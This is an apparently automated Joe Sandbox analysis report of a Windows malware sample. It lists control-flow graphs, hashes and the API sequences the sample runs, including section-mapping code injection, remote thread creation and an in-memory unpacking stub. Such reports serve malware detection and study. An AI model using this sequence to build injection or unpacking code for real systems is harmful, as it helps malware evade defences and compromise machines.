                                              • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                              • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                              • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                              • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 444 514355-51438f call 514668 447 514391-5143c4 VirtualAlloc call 5143e2 444->447 448 5143dd 444->448 450 5143c9-5143db 447->450 448->448 450->448
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005143A6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763649292.0000000000502000.00000040.00000020.00020000.00000000.sdmp, Offset: 00502000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_502000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction ID: 2e72311935caa81f1f60a3eb1c07717b857d4a60658e4b78159fa52134426183
                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction Fuzzy Hash: E8113C79A00208EFDB01DF98C989E98BFF5AF08350F158094F9489B362D371EA90DF80

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                              • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                              • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                              • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_620000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$GetProcAddress.$l
                                              • API String ID: 0-2784972518
                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction ID: 2ba7ce5c814ab9565d4597d47c006d941323b89efae0f9c485d6973fd74c974a
                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction Fuzzy Hash: BF3138B6901619DFEB10CF99D880AEDBBF6FF48324F14504AD441A7312D771AA85CFA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763649292.0000000000502000.00000040.00000020.00020000.00000000.sdmp, Offset: 00502000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_502000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction ID: 38efa1cd337de8c330a452f82f6c6d5c4ca14f215bb635552ecaedd8b6e5a9be
                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction Fuzzy Hash: 4E11AC72740100AFE704CE55DC91EE677EAFB89320B2980A5ED04CB312D679EC82C760
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                              • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                              • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                              • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_620000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction ID: 24baee486935e57d3a0b741057cb9f05ffc7e32a8ab280632829428391162b7e
                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction Fuzzy Hash: 0301F776601A108FEF21CF60E804BEA33F7EF85305F0548E4D90697342E770A8418F80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                              • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                              • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                              • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                              • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                              • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                              • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                              • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                              • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                              • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                              • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                              • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                              • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                              • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                              • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                              • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

                                              Execution Graph

                                              Execution Coverage:8.7%
                                              Dynamic/Decrypted Code Coverage:40.7%
                                              Signature Coverage:0%
                                              Total number of Nodes:118
                                              Total number of Limit Nodes:4
                                              execution_graph 3253 402e40 3255 402e37 3253->3255 3256 402edf 3255->3256 3257 4018e6 3255->3257 3258 4018f5 3257->3258 3259 40192e Sleep 3258->3259 3260 401949 3259->3260 3262 40195a 3260->3262 3263 401514 3260->3263 3262->3256 3264 401524 3263->3264 3265 4015c4 NtDuplicateObject 3264->3265 3274 4016e0 3264->3274 3266 4015e1 NtCreateSection 3265->3266 3265->3274 3267 401661 NtCreateSection 3266->3267 3268 401607 NtMapViewOfSection 3266->3268 3269 40168d 3267->3269 3267->3274 3268->3267 3270 40162a NtMapViewOfSection 3268->3270 3271 401697 NtMapViewOfSection 3269->3271 3269->3274 3270->3267 3272 401648 3270->3272 3273 4016be NtMapViewOfSection 3271->3273 3271->3274 3272->3267 3273->3274 3274->3262 3370 401542 3371 40153b 3370->3371 3372 4015c4 NtDuplicateObject 3371->3372 3381 4016e0 3371->3381 3373 4015e1 NtCreateSection 3372->3373 3372->3381 3374 401661 NtCreateSection 3373->3374 3375 401607 NtMapViewOfSection 3373->3375 3376 40168d 3374->3376 3374->3381 3375->3374 3377 40162a NtMapViewOfSection 3375->3377 3378 401697 NtMapViewOfSection 3376->3378 3376->3381 3377->3374 3379 401648 3377->3379 3380 4016be NtMapViewOfSection 3378->3380 3378->3381 3379->3374 3380->3381 3317 6c0005 3322 6c092b GetPEB 3317->3322 3319 6c0030 3324 6c003c 3319->3324 3323 6c0972 3322->3323 3323->3319 3325 6c0049 3324->3325 3326 6c0e0f 2 API calls 3325->3326 3327 6c0223 3326->3327 3328 6c0d90 GetPEB 3327->3328 3329 6c0238 VirtualAlloc 3328->3329 3330 6c0265 3329->3330 3331 6c02ce VirtualProtect 3330->3331 3333 6c030b 3331->3333 3332 6c0439 VirtualFree 3336 6c04be LoadLibraryA 3332->3336 3333->3332 3335 6c08c7 3336->3335 3341 6c0001 3342 6c0005 3341->3342 3343 6c092b GetPEB 3342->3343 3344 6c0030 3343->3344 3345 6c003c 7 API calls 3344->3345 3346 6c0038 3345->3346 3298 712d1e 3299 712d2d 3298->3299 3302 7134be 3299->3302 3304 7134d9 3302->3304 3303 7134e2 CreateToolhelp32Snapshot 3303->3304 3305 7134fe Module32First 3303->3305 3304->3303 3304->3305 3306 71350d 3305->3306 3308 712d36 3305->3308 3309 71317d 3306->3309 3310 7131a8 3309->3310 3311 7131b9 VirtualAlloc 3310->3311 3312 7131f1 3310->3312 3311->3312 3275 6c003c 3276 6c0049 3275->3276 3288 6c0e0f SetErrorMode SetErrorMode 3276->3288 3281 6c0265 3282 6c02ce VirtualProtect 3281->3282 3284 6c030b 3282->3284 3283 6c0439 VirtualFree 3287 6c04be LoadLibraryA 3283->3287 3284->3283 3286 6c08c7 3287->3286 3289 6c0223 3288->3289 3290 6c0d90 3289->3290 3291 6c0dad 3290->3291 3292 6c0dbb GetPEB 3291->3292 3293 6c0238 VirtualAlloc 3291->3293 3292->3293 3293->3281 3429 402dd0 3430 402ddc 3429->3430 3431 402edf 3430->3431 3432 4018e6 8 API calls 3430->3432 3432->3431 3351 4018f1 3352 4018f6 3351->3352 3353 40192e Sleep 3352->3353 3354 401949 3353->3354 3355 401514 7 API calls 3354->3355 3356 40195a 3354->3356 3355->3356 3416 401915 3417 40191a 3416->3417 3418 4018c6 3416->3418 3419 40192e Sleep 3417->3419 3420 401949 3419->3420 3421 401514 7 API calls 3420->3421 3422 40195a 3420->3422 3421->3422 3294 402f97 3295 4030ee 3294->3295 3296 402fc1 3294->3296 3296->3295 3297 40307c RtlCreateUserThread NtTerminateProcess 3296->3297 3297->3295 3406 402d7b 3409 402d38 3406->3409 3407 402dc7 3408 4018e6 8 API calls 3408->3407 3409->3406 3409->3407 3409->3408 3357 4014fe 3358 401506 3357->3358 3359 401531 3357->3359 3360 4015c4 NtDuplicateObject 3359->3360 3365 4016e0 3359->3365 3361 4015e1 NtCreateSection 3360->3361 3360->3365 3362 401661 NtCreateSection 3361->3362 3363 401607 NtMapViewOfSection 3361->3363 3364 40168d 3362->3364 3362->3365 3363->3362 3366 40162a NtMapViewOfSection 3363->3366 3364->3365 3367 401697 NtMapViewOfSection 3364->3367 3366->3362 3368 401648 3366->3368 3367->3365 3369 4016be NtMapViewOfSection 3367->3369 3368->3362 3369->3365

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 104 4018a5-4018b7 100->104 105 401595-4015be 101->105 106 401896 101->106 111 4018c5 104->111 112 4018bc-4018e3 call 401193 104->112 105->106 115 4015c4-4015db NtDuplicateObject 105->115 106->104 111->112 115->106 117 4015e1-401605 NtCreateSection 115->117 118 401661-401687 NtCreateSection 117->118 119 401607-401628 NtMapViewOfSection 117->119 118->106 121 40168d-401691 118->121 119->118 123 40162a-401646 NtMapViewOfSection 119->123 121->106 124 401697-4016b8 NtMapViewOfSection 121->124 123->118 126 401648-40165e 123->126 124->106 127 4016be-4016da NtMapViewOfSection 124->127 126->118 127->106 130 4016e0 call 4016e5 127->130
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                              • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                              • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                              • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 151 4018a5-4018b7 147->151 152 401595-4015be 148->152 153 401896 148->153 158 4018c5 151->158 159 4018bc-4018e3 call 401193 151->159 152->153 162 4015c4-4015db NtDuplicateObject 152->162 153->151 158->159 162->153 164 4015e1-401605 NtCreateSection 162->164 165 401661-401687 NtCreateSection 164->165 166 401607-401628 NtMapViewOfSection 164->166 165->153 168 40168d-401691 165->168 166->165 170 40162a-401646 NtMapViewOfSection 166->170 168->153 171 401697-4016b8 NtMapViewOfSection 168->171 170->165 173 401648-40165e 170->173 171->153 174 4016be-4016da NtMapViewOfSection 171->174 173->165 174->153 177 4016e0 call 4016e5 174->177
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectView
                                              • String ID:
                                              • API String ID: 1652636561-0
                                              • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                              • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                              • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                              • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 195 4018a5-4018b7 191->195 196 401595-4015be 192->196 197 401896 192->197 202 4018c5 195->202 203 4018bc-4018e3 call 401193 195->203 196->197 206 4015c4-4015db NtDuplicateObject 196->206 197->195 202->203 206->197 208 4015e1-401605 NtCreateSection 206->208 209 401661-401687 NtCreateSection 208->209 210 401607-401628 NtMapViewOfSection 208->210 209->197 212 40168d-401691 209->212 210->209 214 40162a-401646 NtMapViewOfSection 210->214 212->197 215 401697-4016b8 NtMapViewOfSection 212->215 214->209 217 401648-40165e 214->217 215->197 218 4016be-4016da NtMapViewOfSection 215->218 217->209 218->197 221 4016e0 call 4016e5 218->221
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                              • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                              • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                              • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 234 4018a5-4018b7 230->234 235 401595-4015be 231->235 236 401896 231->236 241 4018c5 234->241 242 4018bc-4018e3 call 401193 234->242 235->236 245 4015c4-4015db NtDuplicateObject 235->245 236->234 241->242 245->236 247 4015e1-401605 NtCreateSection 245->247 248 401661-401687 NtCreateSection 247->248 249 401607-401628 NtMapViewOfSection 247->249 248->236 251 40168d-401691 248->251 249->248 253 40162a-401646 NtMapViewOfSection 249->253 251->236 254 401697-4016b8 NtMapViewOfSection 251->254 253->248 256 401648-40165e 253->256 254->236 257 4016be-4016da NtMapViewOfSection 254->257 256->248 257->236 260 4016e0 call 4016e5 257->260
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                              • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                              • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                              • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 274 4018a5-4018b7 270->274 275 401595-4015be 271->275 276 401896 271->276 281 4018c5 274->281 282 4018bc-4018e3 call 401193 274->282 275->276 285 4015c4-4015db NtDuplicateObject 275->285 276->274 281->282 285->276 287 4015e1-401605 NtCreateSection 285->287 288 401661-401687 NtCreateSection 287->288 289 401607-401628 NtMapViewOfSection 287->289 288->276 291 40168d-401691 288->291 289->288 293 40162a-401646 NtMapViewOfSection 289->293 291->276 294 401697-4016b8 NtMapViewOfSection 291->294 293->288 296 401648-40165e 293->296 294->276 297 4016be-4016da NtMapViewOfSection 294->297 296->288 297->276 300 4016e0 call 4016e5 297->300
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                              • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                              • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                              • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
